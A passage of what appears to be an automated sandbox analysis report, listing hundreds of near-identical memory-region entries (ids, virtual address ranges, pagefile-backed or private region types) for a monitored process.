0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5475 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5476 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5477 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5478 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5479 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5480 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5481 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5482 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5483 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5484 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5485 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5486 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5521 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5522 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5523 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5524 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5525 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5526 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5527 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5528 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5529 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5530 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5531 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5532 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5533 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5534 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5535 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5536 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5537 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5538 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5539 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5540 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5541 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5542 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 5543 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 5544 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5545 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5546 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5547 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5548 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5549 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5550 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5551 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5557 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5558 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5559 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5560 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5561 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5562 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5563 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5564 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5565 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5566 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5567 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5568 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5569 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5570 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5571 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5572 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5573 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5574 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5575 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5576 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5577 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5578 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5579 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5580 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5581 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5582 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5583 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5584 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5585 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5586 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5587 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5588 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5589 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5590 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5591 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5592 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5593 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5594 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5605 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5606 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5607 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5608 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5832 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5833 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 5834 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 5835 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5836 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5837 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5838 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5839 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5840 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5841 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5842 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5843 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5844 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5845 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5846 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5847 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5848 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5849 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5850 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5851 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5852 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5853 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5854 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5855 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5856 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5857 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5858 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5859 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5860 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5861 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5862 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5863 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5864 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5865 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5866 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5867 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5868 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5869 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5870 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5871 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5872 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5873 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5874 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5881 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5882 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5883 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5884 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5885 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5886 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5887 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5888 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5889 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5890 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5891 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 5892 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 5893 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5894 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5895 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5896 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5897 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5898 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5899 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5900 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5901 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5902 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5903 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5904 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5905 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5906 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5907 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5908 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5909 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5910 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5911 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5912 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5913 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5914 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5915 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5916 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5917 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5918 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5919 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5920 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5921 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5922 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5923 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5924 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5925 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5926 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5927 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5928 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5929 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5930 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5931 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5932 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5933 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5934 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5935 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5936 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5937 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5938 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5939 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5940 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5941 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5942 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6058 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6059 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6060 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6061 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6062 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = 